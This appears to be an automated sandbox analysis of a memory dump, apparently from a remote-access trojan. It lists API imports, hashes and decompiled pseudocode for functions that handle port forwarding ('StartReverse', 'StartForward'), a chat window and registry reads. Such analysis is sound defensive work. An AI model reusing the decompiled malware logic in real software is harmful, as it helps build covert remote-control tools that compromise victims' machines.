                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • inet_ntoa.WS2_32 ref: 0040A41B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A42E
                                        • atoi.MSVCRT ref: 0040A435
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A472
                                        • atoi.MSVCRT ref: 0040A479
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040A4A6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A544
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415B18), ref: 0040A56E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415B18), ref: 0040A578
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415908), ref: 0040A5AB
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415908), ref: 0040A5B5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000085,?,?,?,?,0041B310,00415908), ref: 0040A5CC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5DD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@V01@@$?c_str@?$basic_string@D@2@@0@Hstd@@V?$basic_string@$?length@?$basic_string@V12@$?substr@?$basic_string@V10@V10@0@atoi$??4?$basic_string@?find@?$basic_string@D@1@@EventV01@inet_ntoa
                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                        • API String ID: 4095635200-168337528
                                        • Opcode ID: f3929fae1f8e497e51fb93d2ade4ea54b572ef24a6e630ee0c1868d71aa5104e
                                        • Instruction ID: b25c6e2405df25c2c81854c085642773db686a1d66d7f735eb38a539f85e00a7
                                        • Opcode Fuzzy Hash: f3929fae1f8e497e51fb93d2ade4ea54b572ef24a6e630ee0c1868d71aa5104e
                                        • Instruction Fuzzy Hash: 3C61A371900309ABDB08BBB1EC4A9EE3B78FB54305F00853AF512A31E1EB78555487AE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040221E, Relevance: 43.7, APIs: 29, Instructions: 151synchronizationthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 00402291
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,69D65DF0), ref: 00402302
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00402363
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040236D
                                        • CreateThread.KERNEL32(00000000,00000000,?,0041BE70,00000000,00000000), ref: 0040237E
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402389
                                        • CloseHandle.KERNEL32(00000000), ref: 00402392
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0040D2B5,69D65DF0), ref: 004023A7
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023B1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023BA
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023C3
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023D5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@CloseD@1@@EventHandleObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 3745950881-0
                                        • Opcode ID: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                        • Instruction ID: 9121e1d36d2ed1e5780a03bc3f6ba97c1b97061ac4fd9a6be39e0f6b7c1c719d
                                        • Opcode Fuzzy Hash: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                        • Instruction Fuzzy Hash: 0451FD7250060EEFCB049FA0DD88CEEBB78FF84355B00806AF916A71A0DB745985CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040295E, Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 167windowmemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 34%
                                        			E0040295E(void* __eflags, intOrPtr _a4, char _a7) {
				char _v5;
				void* _v12;
				char _v28;
				void* _v44;
				char _v60;
				char _v76;
				char _v92;
				struct tagMSG _v120;
				int _t29;
				void* _t35;
				intOrPtr _t41;
				void* _t45;
				void* _t50;
				void* _t51;
				void* _t62;
				void* _t63;
				intOrPtr _t95;
				void* _t97;
				void* _t101;
				void* _t104;
				void* _t105;
				void* _t107;

				_t107 = __eflags;
				_t95 = _a4;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t95 + 0x18);
				_t29 = SetEvent( *(_t95 + 0x28));
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(_t107,  &_v28,  &_v76, 0x41b310,  &_v76, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t104 = _t101 + 0x24;
				_t97 =  *_t29 - 0x3a;
				if(_t97 == 0) {
					_t35 = E0040180C( &_v28, __eflags, 0);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t62 = E00406DD9(_t35);
					__eflags = _t62;
					if(_t62 == 0) {
						L12:
						E004017DD( &_v28);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__eflags = 0;
						return 0;
					}
					 *0x41b794 = E00407033(_t62, "DisplayMessage");
					 *0x41b798 = E00407033(_t62, "GetMessage");
					_t41 = E00407033(_t62, "CloseChat");
					_t105 = _t104 + 8;
					 *0x41b79c = _t41;
					 *0x41b790 = 1;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E004020C2(_t95, 0x74, 0x41b738);
					L10:
					_t63 = HeapCreate(0, 0, 0);
					_t45 =  *0x41b798(_t63,  &_v12);
					__eflags = _t45;
					if(_t45 != 0) {
						_t105 = _t105 - 0x10;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t45,  &_v5);
						E004020C2(_t95, 0x3b, _v12);
						HeapFree(_t63, 0, _v12);
					}
					goto L10;
				}
				_t109 = _t97 != 1;
				if(_t97 != 1) {
					goto L12;
				}
				_t50 = E00412881( &_v92);
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_v92, E0040180C( &_v28, _t109, 0));
				_t51 =  *0x41b794(_t50);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_t51 == 0) {
					goto L12;
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_a7);
				E00412855( &_v60, _t104 - 0x10,  &_v60);
				E004020C2(_t95, 0x3b, 0x41576c);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				L4:
				while(GetMessageA( &_v120, 0, 0, 0) <= 0) {
					if(__eflags >= 0) {
						goto L12;
					}
				}
				TranslateMessage( &_v120);
				DispatchMessageA( &_v120);
				goto L4;
			}

























                                        0x0040295e
                                        0x00402967
                                        0x00402971
                                        0x0040297a
                                        0x00402983
                                        0x0040299b
                                        0x004029ab
                                        0x004029ba
                                        0x004029c4
                                        0x004029c9
                                        0x004029cc
                                        0x004029cf
                                        0x00402a80
                                        0x00402a87
                                        0x00402a93
                                        0x00402a96
                                        0x00402a98
                                        0x00402b33
                                        0x00402b36
                                        0x00402b3e
                                        0x00402b47
                                        0x00402b4f
                                        0x00402b53
                                        0x00402b53
                                        0x00402aaf
                                        0x00402abf
                                        0x00402ac4
                                        0x00402ac9
                                        0x00402acc
                                        0x00402ad3
                                        0x00402adf
                                        0x00402ae9
                                        0x00402aee
                                        0x00402af7
                                        0x00402afe
                                        0x00402b05
                                        0x00402b08
                                        0x00402b0a
                                        0x00402b17
                                        0x00402b21
                                        0x00402b2b
                                        0x00402b2b
                                        0x00000000
                                        0x00402b08
                                        0x004029d5
                                        0x004029d6
                                        0x00000000
                                        0x00000000
                                        0x004029ec
                                        0x004029f5
                                        0x004029fc
                                        0x00402a08
                                        0x00402a10
                                        0x00000000
                                        0x00000000
                                        0x00402a22
                                        0x00402a32
                                        0x00402a3d
                                        0x00402a45
                                        0x00000000
                                        0x00402a4b
                                        0x00402a72
                                        0x00000000
                                        0x00000000
                                        0x00402a78
                                        0x00402a60
                                        0x00402a6a
                                        0x00000000

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402971
                                        • SetEvent.KERNEL32(?), ref: 0040297A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402983
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 0040299B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004029AB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004029BA
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004029F5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402A08
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041576C,?), ref: 00402A22
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000003B), ref: 00402A45
                                        • GetMessageA.USER32 ref: 00402A52
                                        • TranslateMessage.USER32(?), ref: 00402A60
                                        • DispatchMessageA.USER32 ref: 00402A6A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402A87
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B738,00000000,DisplayMessage), ref: 00402ADF
                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00402AF1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00402B17
                                        • HeapFree.KERNEL32(00000000,00000000,?,0000003B), ref: 00402B2B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B3E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B47
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$V01@@$?c_str@?$basic_string@?length@?$basic_string@$D@1@@MessageV12@$?substr@?$basic_string@G@1@@Heap$??2@??3@??4?$basic_string@?find@?$basic_string@CreateDispatchEventFreeTranslateV01@
                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                        • API String ID: 1701728818-749203953
                                        • Opcode ID: 78cabc971eb8825b31cfd8cf90bdfcb476906dc19c985b55c530726c243df69e
                                        • Instruction ID: 706d1787dbe5d31282a01ee588047493408fae45c62342a208237384888500fd
                                        • Opcode Fuzzy Hash: 78cabc971eb8825b31cfd8cf90bdfcb476906dc19c985b55c530726c243df69e
                                        • Instruction Fuzzy Hash: 75517F72A00608EBCB14ABE1ED4D9EE7B7CEF84355B10403AF502E31D1DBB85545CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040BE34, Relevance: 39.1, APIs: 26, Instructions: 148registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 34%
                                        			E0040BE34(char _a4, short* _a20, intOrPtr _a24, char _a27) {
				void* _v8;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				char _v104;
				char _v120;
				char _v136;
				char _v152;
				void* _t28;
				long _t29;
				void* _t35;
				char* _t38;
				char* _t39;
				char* _t40;
				char* _t41;
				char* _t42;
				char* _t43;
				char* _t44;
				void* _t54;
				void* _t56;
				char* _t73;
				void* _t77;
				void* _t79;

				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				_t28 = E0040BD9B( &_a4);
				_t79 = _t77 - 0x10 + 0x10;
				_t47 = 0;
				_t29 = RegOpenKeyExW(_t28, _a20, 0, 0x20019,  &_v8);
				_t90 = _t29;
				if(_t29 != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					E004020C2(0x41bde0, 0x72, "3");
				} else {
					E0040BB20( &_v8, _t90, _v8);
					_pop(_t54);
					_t73 = "0";
					if(_a24 != 0) {
						_t73 = "1";
					}
					_t35 = E00412855(_t54,  &_v152, 0x41bdd0);
					_t56 = 0x41b310;
					_t38 =  &_v88;
					L00414176();
					_t39 =  &_v56;
					L00414140();
					_t40 =  &_v40;
					L00414140();
					_t41 =  &_v24;
					L00414140();
					_t42 =  &_v72;
					L00414140();
					_t43 =  &_v104;
					L00414140();
					_t44 =  &_v136;
					L00414140();
					L00414140();
					E004020C2(0x41bde0, 0x71, _t79 - 0x10);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t44, _t44, _t43, _t43, _t42, _t42, _t41, _t41, _t40, _t40, _t39, _t39, _t38, _t38, _t73, 0x41b310, E00412855(_t56,  &_v120, 0x41be40), 0x41b310, _t35, 0x41be30, 0x41b310, 0x41be50);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
					RegCloseKey(_v8);
					_t47 = 1;
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t47;
			}




























                                        0x0040be49
                                        0x0040be4f
                                        0x0040be54
                                        0x0040be5a
                                        0x0040be67
                                        0x0040be6d
                                        0x0040be6f
                                        0x0040bfea
                                        0x0040bff7
                                        0x0040be75
                                        0x0040be78
                                        0x0040be80
                                        0x0040be81
                                        0x0040be86
                                        0x0040be88
                                        0x0040be88
                                        0x0040beaf
                                        0x0040beb5
                                        0x0040beca
                                        0x0040becf
                                        0x0040bed8
                                        0x0040bedc
                                        0x0040bee5
                                        0x0040bee9
                                        0x0040bef2
                                        0x0040bef6
                                        0x0040beff
                                        0x0040bf03
                                        0x0040bf0c
                                        0x0040bf10
                                        0x0040bf19
                                        0x0040bf20
                                        0x0040bf2a
                                        0x0040bf39
                                        0x0040bf44
                                        0x0040bf4d
                                        0x0040bf56
                                        0x0040bf5f
                                        0x0040bf68
                                        0x0040bf71
                                        0x0040bf7a
                                        0x0040bf83
                                        0x0040bf8f
                                        0x0040bfa0
                                        0x0040bfac
                                        0x0040bfbd
                                        0x0040bfc9
                                        0x0040bfd2
